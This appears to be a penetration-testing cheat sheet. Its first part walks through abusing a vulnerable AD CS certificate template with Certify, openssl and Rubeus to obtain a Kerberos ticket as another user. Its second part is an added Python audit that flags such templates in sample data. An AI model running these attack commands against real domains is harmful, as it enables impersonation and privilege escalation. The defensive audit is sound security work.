Start by using Certify.exe on the target:

# Identify vulnerable AD CS templates.
#
Certify.exe find /vulnerable
 
# Request a certificate using a vulnerable template.
#
Certify.exe request /ca:$AD_CS_CA /template:$TEMPLATE_NAME `
                    $OTHER_OPTIONS_AS_APPROPRIATE_TO_THE_ATTACK

Take the output of the last command above and paste it into $CERTIFICATE_PEM_FILE on the attacking box. Then convert it to a PFX file:

openssl pkcs12 -in $CERTIFICATE_PEM_FILE -keyex \
               -CSP "Microsoft Enhanced Cryptographic Provider v1.0" \
               -export -out $CERTIFICATE_PFX_FILE

Move $CERTIFICATE_PFX_FILE back to the target, and then use Rubeus to seal the deal:

# Request a ticket using a certificate from AD CS.
#
Rubeus.exe asktgt /user:$USER `
                  /enctype:aes256 `
                  /certificate:$CERTIFICATE_PFX_FILE `
                  /password:$CERTIFICATE_FILE_PASSWORD `
                  /outfile:$TICKET_FILE `
                  /domain:$DOMAIN `
                  /dc:$DC_IP_ADDRESS

This is very useful if we’ve used an AD CS misconfiguration as described by SpecterOps’ “Certified Pre-Owned” research to forge a certificate that’s valid for another user.
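
From the defender's side, the template condition that lets a requester obtain a certificate valid for another user can be audited from the template's own attributes. The following is an added example, not part of the original page or of Certify: it checks the conditions the Certified Pre-Owned research lists for that misconfiguration (ESC1), which goes beyond what the page spells out. The sample templates are constructed, and `enroll_principals` is a hypothetical field standing for names resolved from the template's enrollment ACL.

```python
# Added example. Attribute names are the real AD template attributes;
# "enroll_principals" is a hypothetical field holding names resolved from the ACL.
ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (CA manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def audit_template(t):
    """Return the reasons a template is exposed, or [] unless every condition holds."""
    ekus = t.get("pKIExtendedKeyUsage", [])
    # A template with no EKU at all yields a certificate usable for any purpose.
    auth = [AUTH_EKUS[o] for o in ekus if o in AUTH_EKUS] if ekus else ["no EKU restriction"]
    broad = sorted(set(t.get("enroll_principals", [])) & BROAD_PRINCIPALS)
    checks = [
        (bool(t.get("msPKI-Certificate-Name-Flag", 0) & ENROLLEE_SUPPLIES_SUBJECT),
         "requester supplies the subject name"),
        (bool(auth), "valid for authentication: " + ", ".join(auth)),
        (not (t.get("msPKI-Enrollment-Flag", 0) & PEND_ALL_REQUESTS),
         "no CA manager approval"),
        (t.get("msPKI-RA-Signature", 0) == 0, "no authorized signatures required"),
        (bool(broad), "enrollable by: " + ", ".join(broad)),
    ]
    return [why for _, why in checks] if all(ok for ok, _ in checks) else []

def audit(templates):
    """Map template name -> reasons, for exposed templates only."""
    return {t["name"]: r for t in templates if (r := audit_template(t))}

# Constructed sample data, shaped like an LDAP export of pKICertificateTemplate objects.
SAMPLE_TEMPLATES = [
    {"name": "VPNUser-constructed", "msPKI-Certificate-Name-Flag": 0x1,
     "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll_principals": ["Domain Users"]},
    {"name": "WebServer-constructed", "msPKI-Certificate-Name-Flag": 0x1,
     "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"], "enroll_principals": ["Domain Computers"]},
    {"name": "SmartcardApproved-constructed", "msPKI-Certificate-Name-Flag": 0x1,
     "msPKI-Enrollment-Flag": 0x2, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.4.1.311.20.2.2"], "enroll_principals": ["Domain Users"]},
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_TEMPLATES).items():
        print(name, "->", "; ".join(reasons))
```

Clearing any one of the five conditions on a flagged template (for example turning off the supply-in-request subject option or requiring CA manager approval) makes `audit_template` return an empty list for it.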